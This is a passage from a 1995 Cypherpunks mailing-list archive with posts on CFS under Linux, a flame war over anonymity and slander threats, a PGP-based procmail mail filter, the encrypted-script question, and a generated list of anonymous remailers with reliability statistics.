it.  I'll bet he's done dozens of fixes to make CFS run better on Linux 
boxes.

What's more, Matt recently took the trouble to set up a Linux box for the
sole purpose of testing CFS on it. I love Linux and I use it, but the fact
that everyone has a slightly different distribution makes it a tough
platform to support.  As Matt's already pointed out, most of the problems
that people have with Linux and CFS seem to stem from a broken rpgen that
come with some, but not all, distributions of Linux. 

Finally, as Perry pointed out, neither Matt nor AT&T owe us anything, so
it would be impossible to find fault with Matt even if he hadn't done any
work to support Linux. 

Lots of people run CFS on Linux.  I'd even be willing to bet that Linux is 
the most popular CFS platform, judging from the traffic on the list.  If 
you can't run CFS on your Linux box, you might want to consider the 
possibility that you don't know what you're doing.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 25 Dec 1995 07:17:17 +0800
To: cypherpunks@toad.com
Subject: Jingling Bells
Message-ID: <199512241953.OAA15659@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


That NY Times upbeat shopping report on gift-horse
laundering recalls Judeo-Christo-Muslim-Buddhist-whatever
X-marketing of indulgences to complicitously blessed
international drug-running bandit-patrons of days gone
by.

Battling the state for tax-whack is the grand legacy of
brawling twix cult and state. Tithe or tax, forgiveness
or the noose, adorable mass-murderer, theism or atheism,
no exit, you're hoisted.

It's a fine compact for building monuments to bedrugged
faith of earthly pleasures, temples and capitols, cons
spiritual blessing and caressing cons secular for
percentages generous.

Bedrugged with the rich history and rewarding journalism
of such back-scratching by gods of mammons galore, one
wonders how many Caribbean rimmers of yet unadvertized
international cults are now bulging their laundry sacks
cuts of the drugs.

To the cults of rome and jerusalem and mecca for
swamplords of rickety blow-downs, of scientologists
mimcking these venerable predecessors, add the ex-swiss
bankers now sweltering in hellish Cayman, the hot-eyed
ex-usa's with kids in college, sole-practitioner very
hungry beagles, all deeply inhaling the colombian aroma.

All offering mother goose refuge from Sam, off-shore, in
the cave of shadows, any world of illusory power where
you're willing to pay the stiff-arm dues for protective
delusion.

There's no fee meal like that served by god-mammon's own
earthly courtesans and courtiers sweet-and-sour abrading
innermost money=immortality fears.

CoS's E-meter-cleaner is dead-on for E-cash-drug
jingling bells.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Mon, 25 Dec 1995 07:09:04 +0800
To: cypherpunks@toad.com
Subject: corporate bashing
Message-ID: <199512242101.PAA02640@proust.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


There have been some recent posts here flaming AT&T, Netscape, and people 
like Matt and Jeff who work for them.  These posts seem to come out a 
paranoid mindset that distrusts any institution with power, and a 
romantic idea that the cypherpunks are subversive idealists fighting for 
truth and justice in the face of overwhelmingly powerful opponents.

The truth is that several important institutions have contributed a lot 
to the fight for privacy.  That may not be romantic, and it may not fit 
well with some people's adolescent fantasies, but it is what's actually 
happened.

The New York Times, the most influential paper in America, has 
consistently argued against censorship on the net.  

MIT, one of our most prestigious universities, has taken on the free
distribution of strong crypto tools and lent considerable credibility to
Phil Zimmermann. 

AT&T funded the research Matt Blaze did which deomonstrated that a forge
chip would interoperate with an escrowed one.  If we had to pick one
single thing that killed clipper, it would probably be that
deomonstration. 

Netscape not only put crypto into its products, it's opening them up so
that they'll talk to other people's products.  This is a big step forward: 
even if Netscape caves into GAK, you'll be able to talk to one of Sameer's
Apache-SSL servers in the Netherlands.  GAK is unenforceable if standards 
are open and interoperability is possible.  And despite the complaints of 
many here, Netscape has taken a strong stand aginst GAK and ITAR.

Even Microsoft's Bill Gates has apparently written well and persuasively 
aginst GAK.

None of this is conincidental, and if you don't understand why you ought 
to read Friedman's "Capitalism and Freedom".

We are not extremists.  There is nothing extreme about believing that an
email you send to your spouse or your friend ought to be private, or that
people ought to be able to read and write about whatever subject interests
them.  The extremists are those who are fighting so hard to preserve the
possibility of totalitarianism.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Mon, 25 Dec 1995 05:44:32 +0800
Subject: No Subject
Message-ID: <QQzvny09200.199512242137@relay2.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


Eric Murray wrote:

| Where we're headed is mail filters with PGP imbedded (PGP 3 will
| make this much easier) that check incoming mail for a valid signature
| for certain PGP keyid/fingerprints and pass that mail along.
| Other mail that doesn't match gets tossed into a 'junk' folder
| or thrown away if you really don't want to talk to anyone that you
| don't already know.

I agree with the assesment of where we may be going, but the
technology is available now.  (Marshall Rose uses it; if you want to
get mail into his private mailbox, offer him some $ via imbedded FV
authorizations in the mail, and it goes into his inbox.  If he thinks
it was worth his time, he doesn't charge you.)

Anyway, the code is defeintely available now.  The back end is a
little kludgy, but it was needed for an auto ley retreival script.
This could easily be hacked to include a +pubring=$people line.  The
script gives you a keyid, which you can then use to filter on, ie:

:0BW
* -----BEGIN PGP
KEYID=|sender_unknown
# the sender unknown script is below

:0:
? [ $KEYID = (`cat .buddies`) ]
| /var/spool/mail/adam

:0e:
junk

#!/bin/sh
# unknown returns a keyid, exits 1 if the key is known
# $output is to get the exit status. Othierwise, this would be a one liner.
OUTPUT=`pgp -f +VERBOSE=0 +batchmode  -o /dev/null`
echo $OUTPUT | egrep -s 'not found in file'
EV=$? 
if [ $EV -eq 0 ]; then 
        echo $OUTPUT | awk '{print $6}' 
fi
exit $EV


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Fred Cohen)
Date: Mon, 25 Dec 1995 07:50:21 +0800
To: cp@proust.suba.com (Alex Strasheim)
Subject: Re: corporate bashing
In-Reply-To: <199512242101.PAA02640@proust.suba.com>
Message-ID: <9512242220.AA04636@all.net>
MIME-Version: 1.0
Content-Type: text


> We are not extremists.  There is nothing extreme about believing that an
> email you send to your spouse or your friend ought to be private, or that
> people ought to be able to read and write about whatever subject interests
> them.  The extremists are those who are fighting so hard to preserve the
> possibility of totalitarianism.

In that sense, many cypherpunks are not extremists, but in another
sense, many (most?) cypherpunks are.  They seem to believe that in the
Intenet, slander is acceptable behavior and that anonymity should be
used as an escape from responsibility for what they do and say.  If you
want to remain free to speak your mind, you have to become responsible
in at least two ways:

	1 - You must top slandering people.
	2 - You must stop using anonymity as a way to avoid being responsible.

When I say must, I am not intending to mean anything less.  If the
cypherpunks continue to do these two things, they will rapidly find that
they are doing more to destroy all of our rights to free speech in the
Internet than they ever did to encourage freedom of expression.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Mon, 25 Dec 1995 08:16:13 +0800
To: fc@all.net (Fred Cohen)
Subject: Re: corporate bashing
In-Reply-To: <9512242220.AA04636@all.net>
Message-ID: <199512242356.RAA03010@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> 	1 - You must top slandering people.
> 	2 - You must stop using anonymity as a way to avoid being responsible.

No.  

You must learn how to decide whether or not you want to believe something
by looking it's plausibility and where it came form, and when you do learn
that you need to realize that other people know how to do it as well. 

Don't blame anonymity for your own or others' inability to think critically.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 25 Dec 1995 11:30:47 +0800
To: cypherpunks@toad.com
Subject: [Rant] Flame threads
Message-ID: <2.2b7.32.19951225030300.008f8cbc@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Well, this is getting real unpleasant...  So far we have at least three
distinct flame threads going on and all of them are being pretty fucking
pointless.

I am gpoing to address a few issues concerning this just to get them off my
chest and then I am going to drop the issue.

Alice and the Net Scrooge thread:

I agree that Netscape owes a bit more to people who help them out, but some
of your statements come from so far into left field that they are suffering
from lack of oxygen.  Where does AT&T come into the break of SSL and
Netscape?  AT&T may licence Netscape, but they do not own it.  As a licence,
I cannot see how they would bear any financial responsibility for fixes,
breaks or other security breaches.  The only reason I can see for the anger
directed against them is because they are a big company.  Still, your
arguments do not follow.

As for Netscape...  They have been trying pretty damn hard to clean up their
act.  They are actually FIXING bugs that are being reported and not just
forwarding them to Dave Null.  This is an incredible improvement over past
versions.  I think the IPO has had a positive effect becuase now they have
to act like a real company and have real quality control.  This is a good
thing!  Hopefully they will keep up the good work on bug fixes.  (We will
see if they have yet fixed the HP4 print header bug in 2.0b4 though...)

The Anti-Jeff/Matt/AT&T/Netscape thread:

People are not a wholly owned subsidiary of their company.  I judge people
by their actions and not who they work for.  Jeff Weinstien has worked
pretty hard to get things done right within Netscape.  That is not an easy
feat.  (I know this from experience.)  He may sound defensive at times, but
who would not after some of the shit he has to take from idiots who have no
clue as to what it takes to get things done in a corporate environment.  So
far he seems to be doing a pretty damn good job for Netscape and the crypto
community at large.

As for Matt Blaze.  He has done more for the crypto community as a whole
that most anyone I can name.  His accomplisments are pretty impresive.
Anyone who can break Clipper and describe the break in just eight pages
deseves a bit more credit than the anon-twits give him credit for. (Plus CFS
and the various other crypto code he maintains and distributes.)

So far the attacks on Jeff and Matt as being somehow corrupt seem more to
weaken any efforts this list has and not to help them.

Fred Cohen:

You have no respect for the freedom or opinions of others.  You expect the
net to operate under your terms and under your rules.  You want people to be
"responsible".  From what I have read here that seems to mean "punishable".
I do not like some of flames I have seen, but I do not threated legal action
against them. You have.  I have meet the keeper of the list.  He is a very
nice guy and i would not want to see him go through hardship because of some
whacko with a faschist control complex.

Fred -- Go somewhere else.  I suggest you get together with Dan Gannon and
his ilk.  I think you will find him more to your liking.  (Or maybe the
$cientologists.  They are into sueing anyone who disagrees with them. I am
sure they will help you start a list with your control fetishes in mind.
Maybe you can borrow a few of their lawyers.)

BTW, Fred has been killfiled on my mailreader. I am sick of listening to the
twit.  To understand what an honor this is...  He is the only person I have
killfiled on this or any mailinglist.

Sorry to inject this much noise to the list.  I am pretty damn hot over the
amount of shit I have waded through in the last few days.  The legal threats
from Fred were the final straw.  If toad.com ever needs financial support
fighting legal battles from twits such as Fred, they will have my support!

I know Perry will find all of this off topic.  It probibly is...  It just
needed to be said due to my own peace of mind.

Back to the regular scheduled flamethrowing...



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMN4ToeQCP3v30CeZAQFQHQf/U7xnRgq+J50EbEE2qXyPTDjKxq3O1Px1
kY2TtVfSCa5202PL8n7PrMDq9OSvz+IlK1/jmGR8vwncbUerWbZCht23rzK5Kxfn
FnCMPZg0/dCSg/2wsh4O71VU759Gs7lv7cPW2PX2Cjv2RhQ5dqixjui1Tai6DHvG
MSUREvyZf113DJEpWp9GzIARaZVoUK74YgKHnQxjZjYtTI7AqMs+45bf9DyBwYkc
HugoHdsJJ4YuAoozSfuejIkPqlxLY9FDc+4jZBpf6VUr7NpAhYEhrg4VdeENe293
Vd5rJZb0295rDeqIz16hOkoTlQ7vSIglttXufzFNjQVcqaV8YJPSQw==
=QObR
-----END PGP SIGNATURE-----

|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|`finger -l alano@teleport.com` for PGP 2.6.2 key |  behind the keyboard.|
|         http://www.teleport.com/~alano/         |  alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Fred Cohen)
Date: Mon, 25 Dec 1995 08:27:22 +0800
To: cypherpunks@toad.com
Subject: bashing (fwd)
Message-ID: <9512250004.AA08671@all.net>
MIME-Version: 1.0
Content-Type: text


Forwarded message:
>From fc Sun Dec 24 19:04:04 1995
Subject: bashing
To: cp@proust.suba.com (Alex Strasheim)
Date: Sun, 24 Dec 1995 19:04:04 -0500 (EST)
In-Reply-To: <199512242356.RAA03010@proust.suba.com> from "Alex Strasheim" at Dec 24, 95 05:56:44 pm
X-Mailer: ELM [version 2.4 PL22]
Content-Type: text
Content-Length: 1253      

> > 	1 - You must top slandering people.
> > 	2 - You must stop using anonymity as a way to avoid being responsible.
> 
> No.  
> 
> You must learn how to decide whether or not you want to believe something
> by looking it's plausibility and where it came form, and when you do learn
> that you need to realize that other people know how to do it as well. 

I'm all for believing or not believing based on your understandings, but
this is not the same as slander or irresponsible behavior hidden behind
false identity.

I'm also in favor of anonymity, but not for the purpose of slander. 
There are a lot of good and valid reasons for anonymity, and I believe
that it is a basic requirement of freedom, but we will lose the ability
to be anonymous if enough of us abuse the freedom.

> Don't blame anonymity for your own or others' inability to think critically.

I don't and didn't blam anonymity for this.  I blame people who hide
behind anonymity as a way to be irresponsible without apparent recourse. 

Evaluating statements and giving your opinion is not the same as making
insluting, untrue, and crude remarks about individuals.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Mon, 25 Dec 1995 09:59:31 +0800
To: Fred Cohen <fc@all.net>
Subject: Re: bashing (fwd)
In-Reply-To: <9512250004.AA08671@all.net>
Message-ID: <Pine.SV4.3.91.951224203026.11836A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain



> Evaluating statements and giving your opinion is not the same as making
> insluting, untrue, and crude remarks about individuals.

   So Fred, I gather that you believe that there is an absolute metric of
insultingness, of untruthfulness, of crudeness.

  Possibly you think that you, Fred Cohen, are a good judge of these
things, or that you know who to trust, to delegate these measurements to? 

  Yes, Fred, please do act now to ensure that other Netters are held to 
the standards you propose. Perhaps you can propose a law that will 
enforce your will?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Sun, 24 Dec 1995 19:03:42 +0800
To: andr0id@midwest.net (Jason Rentz)
Subject: Re: ex encrypted script
In-Reply-To: <199512202339.RAA05220@cdale1.midwest.net>
Message-ID: <199512241046.VAA06529@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello andr0id@midwest.net (Jason Rentz)
  and Cypherpunks

Dr0id wrote:
> I have several simple scripts that are simple yet handle important realtime
> call proccessing tasks and remote control operations.  These programs are my
> programs but are running on a system that is dialed into by the vendor once
> in a while.  

The problem will be that a superuser can do just about anything...

> Is there a way to encrypt a script yet still allow it to be runnable?  I
...

Well, what's wrong with 
  pgp -f | /bin/sh
? Obviously, it still decrypts before use, and may or may not be
useful depending on your application, but it never has a file with
the unencrypted script around.

> I thought of a few simple protections but they all involve decrypting before
> running.

It depends on what you want to prevent: copying the scripts, running 
them, understanding them, or what?

To prevent copying/running them, you can use the above script, but
you'll have to type in the passphrase each time (checking that noone
is watching you, which is impossible with a determined su).

If you just want them to not understand, obfuscation should suffice.
(But reverse-engineering can still be applied.)


(On the "supply useless source" subthread, it is possible to define
the term "source code" so as to disallow such obfuscation. See the
GNU GPL ("copyleft") licence for an example.)

Adiau

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMN0vfyxV6mvvBgf5AQGHkwP9EXLywkYYY6yNEAD3psLr/mbd7ACDe9hF
NxDdu1LRQqtTmRx2GaozIEg2QWBaADEZ3TP7WyQyN9g81mC5bPk6Ys7imCvSDYW5
U1qg6MuE/biLlKuScE0AlpPeeKmqwSdG8bo8IsnMyyBnaeN1mBvfXVbwXzkpgJ7O
3IwGHbmB/wg=
=+g0v
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Mon, 25 Dec 1995 09:33:26 +0800
To: cypherpunks@toad.com
Subject: Re: PGP timeline FAQ... comments requested
Message-ID: <199512250123.UAA18523@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 22 Dec 95 13:37:35 GMT, you wrote:

[..]

Great job. A couple of suggestions...

Version histories, with differences in each version. Also good to
debunk the "PGP before version x isn't safe to use" myth.  Might also
want to throw in info about PGP hacks (mainly outside US), development
of other software like SecureDrive, SFS, HPack (an archiver that uses
PGP keys for digital signatures of files or encryption), development
of anonymous remailers that use PGP, and even something about planned
future developments (PGP 3.0, PGPPhone, etc...)


>Long live the Pretty Good revolution,

>Adam Back <aba@dcs.ex.ac.uk>


Merry solstice,

--Mutant Rob






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Mon, 25 Dec 1995 14:56:28 +0800
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Fred Cohen: Re: CFS and Linux
In-Reply-To: <Pine.BSF.3.91.951224042445.20498A-100000@mercury.thepoint.net>
Message-ID: <Pine.BSD.3.91.951225020645.6606A-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Brian:

    	There is no way Cohen can send the police to confiscate toad.com, or
    any other computer without some form of criminal complaint --other 
    than by himself as citizen whistle-blower.

	I read the situation as Cohen was planning to attempt to make the
    actions a _criminal_ conspiracy. _If_ Cohen was successful in
    convincing either a state or Federal DA to seek a grand jury
    indictment, then the local police or the federal marshalls could be
    issued a search warrant to collect evidence. 

	I can see Cohen trying to present his case before the Federal 
    bench! In fact, I might be willing to pay admission.  Cohen lives in
    Hudson OH which is also the location of jis private <all.net>. Hudson
    is in Summit County and Akron (the county seat) has a branch court of
    the 4th Federal District (or used to).

	In West Virginia hill towns they teach the 3Rs: reading, 'riting,
    and the route to Akron, which is referred to as the capital of West
    Virignia. I can see the tremendous empathy of these people for Cohen's
    cause. <g>

	As I mention above, getting a DA's attention on questionable
    slander, is a bit far-fetched!  Tactically, I would think Cohen would
    find it necessary to actually win a civil suit which clearly indicated
    there was not only slander, but there was a malicious conspiracy to
    discredit Cohen. 

	Until Cohen actually manages to score a civil victory, I believe
    he is dead in the water. 

	Cohen should probably include me in his action --my idea of 
    discrediting Dr. Fred was putting him in procmailrc. Dr. Frederick B. 
    Cohen became Fred Cohen so part of this thread (missing anything from
    all.net) bled through.  No more, so I will not even see any of the 
    falderol if Fred*Cohen is anywhere in the text.

On Sun, 24 Dec 1995, Brian Davis wrote:

> On Sun, 24 Dec 1995, attila wrote:
> 
> > On Sun, 24 Dec 1995, Brian Davis wrote:
> > 
> > > On Sat, 23 Dec 1995, Perry E. Metzger wrote:
> > > > > Fred Cohen writes to me in private:
> > > ...
> > > > 
> > > > Let's see.  I guess I would start by having the police confiscate the
> > > > toad.com computers becfause thay are part of a criminal conspiracy to
> > > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> > > I didn't realize that AI research was that far along.  Can someone point 
> > > me to the specs for the computer that can become a "part of a criminal 
> > > conspiracy"??
> > > 
> > > EBD
> > > 
> > > 
> > > > daamage my reputation.  Criminal because of the recent changes in the
> > > > law that prohibit you from sending me information I don't want to get.
> > > > 
> > >
> > 	the basis of the seizure is for evidence collection.  then they
> >     take their sweet time scrounging the disks for evidence.  If no
> >     evidence is found, they give it back --eventually.  I saw one case go 
> >     by a couple years back where they were trying to make the computer an
> >     accessory to the crime (I dunno, maybe it was supposed to auto-dial
> >     and drop the dime --no that's in 18USC as failure to snitch!)
> 
> Much truth here, but not relevant to Dr. Fred's threat of a civil suit.  
> He can't have his attorneys just call the FBI to pick up toad's computer.
> 
> CoS's seizure of computers, while shameful, was based on a different 
> legal theory than the good Dr. can possibly allege. 
> 
> 
> EBD
> 
> 
> > 	of course, if there are drugs involved, they confiscate it as
> >     spoils of the criminal act and the equipment is impounded and
> >     eventually sold after conviction for the benefit of their slush funds. 
> > 
> > 	I would imagin you have seen plenty of the latter one in the
> >     Federal attorney's office. this also gets into the issues of private
> >     cryptography and that _everybody_ should give up privacy protection,
> >     first amendment rights, etc. so uncle can catch a few dopers, gun 
> >     runners, and other assorted malcreants [sic] --like the difference 
> >     between {mis,mal}feasance: in both cases you get fucked, but 'mal' is
> >     intentional... 
> > 
> >  
> > > Not a lawyer on the Net, although I play one in real life.
> > >
> >     hey, at least you admit you're having a good time!
> > 
> > > **********************************************************
> > > Flame away! I get treated worse in person every day!!
> > > 
> >     
> > 
> > --
> > --------------------------------------------------------------------
> > #!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
> > $m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
> > 2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
> > pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length$n&~1)/2)
> > 
> > -----BEGIN PGP PUBLIC KEY BLOCK-----
> > Version: 2.6.2
> > 
> > mQCNAy5vBesAAAEEAN8cl6vHXrKZ9lFfZDgfyJRr3HidW77Uio7F25QF6QXca5z/
> > AS3ZrWsa0CjF2nwrqmyb1E5no7dFB+70ZfK8233r7ykVkWRojT+0K71lnUZO4cjG
> > +d19/ehXkDpkH3iHU7Uyo4ZdXLiI6uoFDS7ilzx8PCKcgvfq7b04kQrCC2kFAAUX
> > tAZhdHRpbGGJAJUDBRAur/X7xUpiaI661j0BAbVUA/9RSKN5sOFVB4rjV6+a2aWD
> > LjD5g/+eZaB/hI98qlPP+SBwzO3+K7+JWt3Fez0gKVju228ACGkvilg2VkMtQ0zm
> > YCexYL0U9StzHt4xEpowpmaWx22jpEvWnI10LZvT/NO3uYg5r/ezVYc7autKvfvI
> > rVOo322RkA0HNVV1rqjMGw==
> > =UNt4
> > -----END PGP PUBLIC KEY BLOCK-----
> > 
> > 
> 
> Not a lawyer on the Net, although I play one in real life.
> **********************************************************
> Flame away! I get treated worse in person every day!!
> 

--
--------------------------------------------------------------------
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length$n&~1)/2)

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAy5vBesAAAEEAN8cl6vHXrKZ9lFfZDgfyJRr3HidW77Uio7F25QF6QXca5z/
AS3ZrWsa0CjF2nwrqmyb1E5no7dFB+70ZfK8233r7ykVkWRojT+0K71lnUZO4cjG
+d19/ehXkDpkH3iHU7Uyo4ZdXLiI6uoFDS7ilzx8PCKcgvfq7b04kQrCC2kFAAUX
tAZhdHRpbGGJAJUDBRAur/X7xUpiaI661j0BAbVUA/9RSKN5sOFVB4rjV6+a2aWD
LjD5g/+eZaB/hI98qlPP+SBwzO3+K7+JWt3Fez0gKVju228ACGkvilg2VkMtQ0zm
YCexYL0U9StzHt4xEpowpmaWx22jpEvWnI10LZvT/NO3uYg5r/ezVYc7autKvfvI
rVOo322RkA0HNVV1rqjMGw==
=UNt4
-----END PGP PUBLIC KEY BLOCK-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 25 Dec 1995 23:11:22 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199512251450.GAA06781@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub ek";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash latent ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp. hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut";
$remailer{"shinobi"} = "<remailer@shinobi.alias.net> cpunk mix hash latent cut ek reord";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ek ksub";
$remailer{"gondolin"} = "<mix@remail.gondolin.org> cpunk mix pgp hash latent cut ek reord";
$remailer{"tjava"} = "<remailer@tjava.com> cpunk mix pgp hash latent cut";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'gondonym'} = '<alias@nym.gondolin.org> alpha pgp';
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 robo hroller alpha)
(gondolin gondonym)
(flame hacktic replay)
(alumni portal)
(vishnu spook wmono)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Note: all of the "ek" tags have been verified correct. Apologies to
those who were inconvenienced by incorrect "ek" tags in the past.

Last update: Mon 25 Dec 95 6:45:54 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
hacktic  remailer@utopia.hacktic.nl       ***+*+******     7:48  99.98%
c2       remail@c2.org                    -+++++++.-++  1:29:45  99.96%
replay   remailer@replay.com              ******+*****     9:47  99.95%
portal   hfinney@shell.portal.com         .#**+#######    11:36  99.94%
bsu-cs   nowhere@bsu-cs.bsu.edu           #*#-####*#+#    12:47  99.91%
rmadillo remailer@armadillo.com           ++ +++++++++    39:31  99.89%
shinobi  remailer@shinobi.alias.net       ++--_.--++++  4:25:47  99.88%
alumni   hal@alumni.caltech.edu           -+*++##+###*    15:14  99.86%
ford     remailer@bi-node.zerberus.de     .-+++++-+-++  4:08:57  99.85%
flame    remailer@flame.alias.net         ***+**++.--   5:58:46  99.75%
hroller  hroller@c2.org                   -##+####.-##    47:58  99.75%
spook    remailer@valhalla.phoenix.net    * *+* **.--+  3:44:23  99.69%
vishnu   mixmaster@vishnu.alias.net       #*++*** ---   1:19:08  99.68%
tjava    remailer@tjava.com                          #      :23  99.48%
mix      mixmaster@remail.obscura.com     +-+++____.-  20:55:03  99.27%
extropia remail@extropia.wimsey.com       -.-.-----.   14:54:08  99.16%
wmono    wmono@valhalla.phoenix.net       * *+*   * **    13:17  98.94%
amnesia  amnesia@chardos.connix.com       ----- --++-   3:09:50  98.65%
penet    anon@anon.penet.fi               _....-.--- * 13:40:31  98.35%
gondolin mix@remail.gondolin.org          --____.-*+   18:46:33  96.41%
rahul    homer@rahul.net                  *#++***-+##*    21:00  99.97%
ecafe    cpunk@remail.ecafe.org           -####**-#       27:03  65.05%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
